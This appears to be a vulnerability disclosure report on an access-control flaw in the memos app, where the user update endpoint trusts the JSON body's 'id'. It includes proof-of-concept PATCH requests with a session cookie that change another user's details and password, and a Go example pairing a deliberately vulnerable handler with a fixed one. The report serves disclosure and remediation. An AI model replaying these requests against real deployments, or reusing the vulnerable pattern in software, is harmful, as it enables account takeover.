A user can update information / password from other users in usememos/memos
Valid
Reported on Dec 21st 2022
Description
A normal user (neither admin nor host) can modify the nickname, username, email and password of other users without permission. The user update endpoint validates the id in the URL path against the session, but applies the update to the user named by the "id" field of the JSON body, which is never checked against the caller.
Steps to Reproduce
- Log in as user A (here "ileana.maricel", HOST role).
- In another browser, log in as user B ("ileana.mariceel", USER role) and copy its session cookie.
- With user A, go to Setting --> Update Information and change the nickname, username and/or email.
- When clicking Save, intercept the request with a web proxy and replace the cookie with user B's cookie value. Also change the id in the path to user B's id, so that the path validation passes; the JSON body still carries user A's id:
PATCH /api/user/2 HTTP/1.1
Host: localhost:5230
Content-Type: application/json
Cookie: memos_session=MTY3MTU3OTA0MXxEdi1CQkFFQ180SUFBUkFCRUFBQUh2LUNBQUVHYzNSeWFXNW5EQWtBQjNWelpYSXRhV1FEYVc1MEJBSUFCQT09fOcAjJ2GPp5-cAXssL0lYKwcUk2hOR1JVz35py1Cn8sK
Connection: close

{"id":1,"nickname":"ileana.maricel.edited","username":"ileana.maricel.username.modified","email":"test@test.com"}
- Send the request: user A's information has been changed by a request authenticated as user B.
- The same endpoint can also change the password of other users. In user A's session, go to Setting --> Change Password.
- Enter the required values, click Save and intercept the request.
- Replace the cookie with user B's cookie and change the path id to 2 (user B's id), so that validation passes. The body still carries user A's id, so it is user A's password that gets changed:
PATCH /api/user/2 HTTP/1.1
Host: localhost:5230
Content-Type: application/json
Cookie: memos_session=MTY3MTU3OTA0MXxEdi1CQkFFQ180SUFBUkFCRUFBQUh2LUNBQUVHYzNSeWFXNW5EQWtBQjNWelpYSXRhV1FEYVc1MEJBSUFCQT09fOcAjJ2GPp5-cAXssL0lYKwcUk2hOR1JVz35py1Cn8sK
Connection: close

{"id":1,"password":"Changed"}
- Log out of user A and try to log in with that user's original credentials: it is no longer possible.
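The authorization flaw behind these steps, as an added example that is not code from this report or from the memos project: a minimal Go handler that, like the one the steps describe, authenticates the session but picks the row to update from the "id" in the JSON body, beside a hardened version that takes the target from the URL path, rejects a body id that disagrees with it, and lets a non-HOST caller update only their own record. The in-memory Store, the two sample users, the placeholder cookie values and all handler logic are assumptions made for the example; it tracks only the password field, but nickname, username and email go through the same check.

```go
package main

import (
	"encoding/json"
	"fmt"
	"net/http"
	"net/http/httptest"
	"strings"
)

// User stands in for a row of the user table; NewStore loads two records that
// mirror the report's users (constructed sample data, not real accounts).
type User struct {
	ID                       int
	Username, Role, Password string
}

type Store struct{ users map[int]*User }

func NewStore() *Store {
	return &Store{users: map[int]*User{
		1: {ID: 1, Username: "ileana.maricel", Role: "HOST", Password: "secret-A"},
		2: {ID: 2, Username: "ileana.mariceel", Role: "USER", Password: "secret-B"},
	}}
}

func (s *Store) PasswordOf(id int) string { return s.users[id].Password }

// sessions maps a memos_session cookie value to a user id (placeholder values).
var sessions = map[string]int{"cookie-of-user-A": 1, "cookie-of-user-B": 2}

// userPatch tracks only the password; nickname, username and email go the same way.
type userPatch struct {
	ID       *int    `json:"id"`
	Password *string `json:"password"`
}

func sessionUser(r *http.Request) (int, bool) {
	if c, err := r.Cookie("memos_session"); err == nil {
		id, ok := sessions[c.Value]
		return id, ok
	}
	return 0, false
}

// Vulnerable checks only that a session exists, then trusts the body's "id"
// to pick the row to update: the pattern the report's requests exploit.
// Both handlers return the HTTP status a real net/http handler would write.
func (s *Store) Vulnerable(r *http.Request) int {
	if _, ok := sessionUser(r); !ok {
		return http.StatusUnauthorized
	}
	var p userPatch
	if err := json.NewDecoder(r.Body).Decode(&p); err != nil || p.ID == nil || s.users[*p.ID] == nil {
		return http.StatusBadRequest
	}
	if p.Password != nil {
		s.users[*p.ID].Password = *p.Password
	}
	return http.StatusOK
}

// Fixed takes the target from the path, rejects a body "id" that disagrees
// with it, and lets a non-HOST caller update only their own record.
func (s *Store) Fixed(r *http.Request) int {
	callerID, ok := sessionUser(r)
	if !ok || s.users[callerID] == nil {
		return http.StatusUnauthorized
	}
	var targetID int
	if _, err := fmt.Sscanf(r.URL.Path, "/api/user/%d", &targetID); err != nil || s.users[targetID] == nil {
		return http.StatusNotFound
	}
	var p userPatch
	if err := json.NewDecoder(r.Body).Decode(&p); err != nil || (p.ID != nil && *p.ID != targetID) {
		return http.StatusBadRequest
	}
	if callerID != targetID && s.users[callerID].Role != "HOST" {
		return http.StatusForbidden
	}
	if p.Password != nil {
		s.users[targetID].Password = *p.Password
	}
	return http.StatusOK
}

// Send builds one PATCH with the given cookie, path and JSON body and returns the status.
func Send(h func(*http.Request) int, cookie, path, body string) int {
	req := httptest.NewRequest(http.MethodPatch, path, strings.NewReader(body))
	req.AddCookie(&http.Cookie{Name: "memos_session", Value: cookie})
	return h(req)
}

func main() {
	// The report's request: user B's cookie, B's id in the path, A's id in the body.
	v, f := NewStore(), NewStore()
	fmt.Println(Send(v.Vulnerable, "cookie-of-user-B", "/api/user/2", `{"id":1,"password":"Changed"}`), v.PasswordOf(1))
	fmt.Println(Send(f.Fixed, "cookie-of-user-B", "/api/user/2", `{"id":1,"password":"Changed"}`), f.PasswordOf(1))
}
```

Send replays the exact shape of the report's request (user B's cookie, B's id in the path, A's id in the body). Against Vulnerable the host's password changes; against Fixed the mismatching body id is rejected, and a direct PATCH of /api/user/1 by user B is refused with 403 because the decision is made on the session and the path, never on the body.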
Impact
This vulnerability affects integrity: other users' information is changed without their consent. It also affects confidentiality, since the access control is broken and a user can modify a resource he does not own. Finally, it can affect availability: the attacker can change not only usernames but also the passwords of other users, after which the victim cannot log in unless he guesses the new username and password.